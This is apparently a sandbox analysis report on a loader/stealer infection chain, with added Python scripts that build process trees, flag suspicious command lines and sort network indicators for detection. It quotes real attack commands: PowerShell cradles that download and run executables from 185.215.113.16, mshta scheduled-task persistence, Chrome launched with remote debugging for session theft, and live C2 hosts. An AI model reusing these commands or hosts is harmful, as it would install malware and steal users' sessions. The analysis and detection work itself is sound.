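    lines = []
    for text, repeats in rows:
        lines.extend([text] * repeats)
    return lines


def parse_rows(lines):
    """(src_pid, dst_pid, src_image, dst_image) per row; non-matching lines are skipped."""
    parsed = []
    for line in lines:
        m = ROW_RE.match(line.strip())
        if m:
            src, dst, src_img, dst_img = m.groups()
            parsed.append((int(src), int(dst), src_img, dst_img))
    return parsed


def collapse(parsed):
    """One edge per (src_pid, dst_pid) with its write count, plus every image name seen per PID."""
    counts = Counter((s, d) for s, d, _, _ in parsed)
    names = defaultdict(set)
    for s, d, src_img, dst_img in parsed:
        names[s].add(basename(src_img))
        names[d].add(basename(dst_img))
    return counts, names


def suspicious(counts, names, baseline=4):
    """Edges worth a second look: same image on both ends, or more writes than a plain spawn.

    baseline=4 is what this run shows for an ordinary CreateProcess (assumption
    taken from the table, not a general constant)."""
    flags = []
    for (s, d), n in counts.items():
        if names[s] & names[d]:
            flags.append((s, d, "same image on both ends (self-injection pattern)"))
        if n > baseline:
            flags.append((s, d, f"{n} writes, above the {baseline}-per-spawn baseline"))
    return flags


def render_tree(counts, names, root):
    """Indented process tree from the collapsed edges, rooted at the sample's PID."""
    children = defaultdict(list)
    for (s, d), n in counts.items():
        children[s].append((d, n))
    lines = []

    def walk(pid, writes, depth):
        label = "|".join(sorted(names[pid]))  # a PID logged under two names shows both
        suffix = f" ({writes} writes)" if writes else ""
        lines.append(f"{'  ' * depth}{pid} {label}{suffix}")
        for child, n in sorted(children[pid]):
            walk(child, n, depth + 1)

    walk(root, 0, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    counts, names = collapse(parse_rows(expand(SAMPLE_ROWS)))
    print(render_tree(counts, names, 2520))
    for s, d, why in suspicious(counts, names):
        print(f"flag {s}->{d}: {why}")
```

Run against the full table the same way (paste the rows into a file and feed `parse_rows` its lines); the only edge that trips either rule in this report is 1740 to 2820. Treat the write count as a triage hint, not proof of injection: the memory dump memory/2820-78-0x0000000000400000-0x000000000045F000 listed under Files is where to confirm what was written.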

Processes

C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

"C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\hWO8LyeS1.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef70e9758,0x7fef70e9768,0x7fef70e9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1100 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2384 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2276 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\taskeng.exe

taskeng.exe {BE56D322-AA82-4DF6-A41C-362E7701F7AC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]

C:\ProgramData\rwhkbvh\apitlt.exe

C:\ProgramData\rwhkbvh\apitlt.exe

C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 508

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
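The command lines above contain the whole infection chain in plain text: a scheduled task named by a PowerShell Get-Random one-liner that runs an HTA through mshta every 25 minutes, the HTA's PowerShell download cradle fetching random.exe from 185.215.113.16 and starting it, Chrome launched with --remote-debugging-port=9223 so a DevTools client can read the logged-in session, and a delayed rd /s /q self-cleanup. One detail a detection author should not miss: the first cradle builds its target as `$env:temp+'AAVUNL...EXE'` with no backslash, which is why the payload lands at `...\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE` beside %TEMP% rather than inside it, so a rule keyed on `%TEMP%\*.exe` misses it; the second HTA is also dropped under C:\Temp, not the user's temp directory. The Python below is an added example for this page, not report output or code from the sandbox; it embeds an excerpt of the command lines as sample input, and the ATT&CK technique IDs are the editor's mapping, not the report's.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the Processes section above, one command line per entry.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"',
    r'C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f',
    r'mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;''',
    r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"',
    r'schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;''',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
    r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68',
]


@dataclass
class Finding:
    rule: str
    technique: str   # ATT&CK mapping chosen by the editor; "-" when purely contextual
    detail: str
    cmdline: str
    note: str = ""


URL_RE = re.compile(r"https?://[^\s'\"]+")


def classify(cmdline):
    """Apply every rule to one command line and return the findings that fire."""
    low = cmdline.lower()
    found = []

    if "schtasks" in low and "/create" in low and "mshta" in low:
        task = re.search(r'/tn\s+"?([^\s"]+)', cmdline, re.I)
        found.append(Finding("scheduled task runs mshta", "T1053.005 / T1218.005",
                             f"task {task.group(1) if task else '?'}", cmdline))

    if "downloadfile(" in low and "start-process" in low:
        dest = re.search(r"\$env:temp\+'([^']+)'", cmdline, re.I)
        note = ""
        if dest and not dest.group(1).startswith("\\"):
            # The AAVUNL... cradle above: no separator, so the file lands next to %TEMP%.
            note = "no path separator after $env:temp: file lands beside %TEMP%, not inside it"
        for url in URL_RE.findall(cmdline):
            found.append(Finding("PowerShell download-and-execute cradle", "T1059.001 / T1105",
                                 url, cmdline, note))

    port = re.search(r"--remote-debugging-port=(\d+)", low)
    if port and "chrome" in low:
        found.append(Finding("browser started with remote debugging", "T1539",
                             f"port {port.group(1)}", cmdline))

    if "timeout /t" in low and "rd /s /q" in low:
        target = re.search(r'rd /s /q\s+"?([^"&]+)', cmdline, re.I)
        found.append(Finding("delayed directory wipe", "T1070.004",
                             target.group(1).strip() if target else "?", cmdline))

    if "get-random" in low and "[char]" in low:
        found.append(Finding("random name generation via PowerShell", "T1059.001",
                             "random alphanumeric string", cmdline))

    crash = re.search(r"werfault\.exe .*-p (\d+)", low)
    if crash:
        # Not malicious by itself; tells you which payload PID fell over.
        found.append(Finding("crash reporter for a child PID", "-",
                             f"PID {crash.group(1)}", cmdline))
    return found


def scan(cmdlines):
    findings = []
    for cmdline in cmdlines:
        findings.extend(classify(cmdline))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.technique:22} {f.rule}: {f.detail}{'  [' + f.note + ']' if f.note else ''}")
```

The rules are deliberately string-level so they port directly to a SIEM query over process-creation events (Sysmon Event ID 1 or 4688 with command-line logging); the schtasks rule should also be evaluated against the task's XML, because the mshta command line only appears as the child of cmd.exe in one of the two instances above.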

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
DE 104.194.157.122:80 104.194.157.122 tcp
FI 65.109.226.203:443 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
FI 65.109.226.203:443 tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 udp
US 104.21.48.1:443 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.94.161:443 advertised.life tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 104.21.38.27:443 outlinedtrai.bet tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
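Reading the network table raw is error-prone because the domain column is optional and the same destination repeats many times. A few points are worth pulling out mechanically: the plaintext HTTP connections to bare IPs (185.215.113.16:80 is the host in both download cradles in the Processes section); the domains that were resolved through 8.8.8.8 but never had a TCP connection in this capture (which can mean NXDOMAIN or simply an unobserved connection, the table cannot tell you which); the one non-standard port (93.186.202.3:4000); the loopback connections to 127.0.0.1:9223, which line up with the chrome.exe --remote-debugging-port=9223 command line; and the connections to t.me and steamcommunity.com, legitimate services that Vidar-family samples are known to use as dead-drop resolvers for their real C2 address, so they belong on a watch list rather than a block list. The Python below is an added example for this page, not sandbox output; it embeds an excerpt of the table as constructed input, and DEAD_DROP_HOSTS is an analyst-maintained list assumed for the example.

```python
# Constructed excerpt of the Network table above, in the report's own row format
# (country, destination, optional domain, protocol).
SAMPLE_NETWORK = """\
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 udp
"""

# Legitimate services this family is known to use as dead-drop resolvers for its
# real C2 address. Assumed watch list for the example; keep it, do not block it.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}


def parse_network(text):
    """Rows -> dicts. The domain column is optional, so the row is split by token count."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dst, domain, proto = parts
        elif len(parts) == 3:
            country, dst, proto = parts
            domain = None
        else:
            continue
        ip, port = dst.rsplit(":", 1)
        records.append({"country": country, "ip": ip, "port": int(port),
                        "domain": domain, "proto": proto})
    return records


def ioc_summary(records):
    """Group the rows into the buckets an analyst actually acts on."""
    queried, connected_domains = set(), set()
    bare_ip_http, nonstandard, loopback, dead_drop = set(), set(), set(), set()
    for r in records:
        if r["proto"] == "udp" and r["port"] == 53:
            if r["domain"]:
                queried.add(r["domain"])
            continue
        if r["proto"] != "tcp":
            continue                      # mDNS and other UDP noise
        if r["ip"].startswith("127."):
            loopback.add(r["port"])       # local DevTools port, not an egress IOC
            continue
        if r["domain"] and r["domain"] != r["ip"]:
            connected_domains.add(r["domain"])
            if r["domain"] in DEAD_DROP_HOSTS:
                dead_drop.add(r["domain"])
        elif r["port"] == 80:
            bare_ip_http.add((r["ip"], r["port"]))   # plaintext HTTP straight to an IP
        if r["port"] not in (80, 443):
            nonstandard.add((r["domain"], r["ip"], r["port"]))
    return {
        "dns_only": queried - connected_domains,   # resolved, but no TCP seen in this capture
        "bare_ip_http": bare_ip_http,
        "nonstandard_ports": nonstandard,
        "loopback_ports": loopback,
        "dead_drop_hosts": dead_drop,
        "connected_domains": connected_domains,
    }


if __name__ == "__main__":
    for bucket, values in ioc_summary(parse_network(SAMPLE_NETWORK)).items():
        print(f"{bucket}: {sorted(values, key=str)}")
```

For blocking, the bare-IP HTTP hosts and the non-standard-port destination are the safe candidates; the dns_only set needs a second source (passive DNS or the pcap) before it is treated as more than a lookup.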

Files

memory/2520-0-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-1-0x0000000077A90000-0x0000000077A92000-memory.dmp

memory/2520-2-0x0000000000E01000-0x0000000000E69000-memory.dmp

memory/2520-3-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-5-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-16-0x0000000006940000-0x0000000006E09000-memory.dmp

memory/2520-21-0x0000000000E01000-0x0000000000E69000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 78ec3bb0db3cee811be50f99dd89e2fe
SHA1 1ec0122be4458914a8b07c7b0bf34faf47d14c19
SHA256 f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
SHA512 d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082

memory/2520-20-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2716-22-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2520-18-0x0000000006940000-0x0000000006E09000-memory.dmp

memory/2716-23-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-24-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-27-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-26-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-28-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-29-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-30-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-31-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
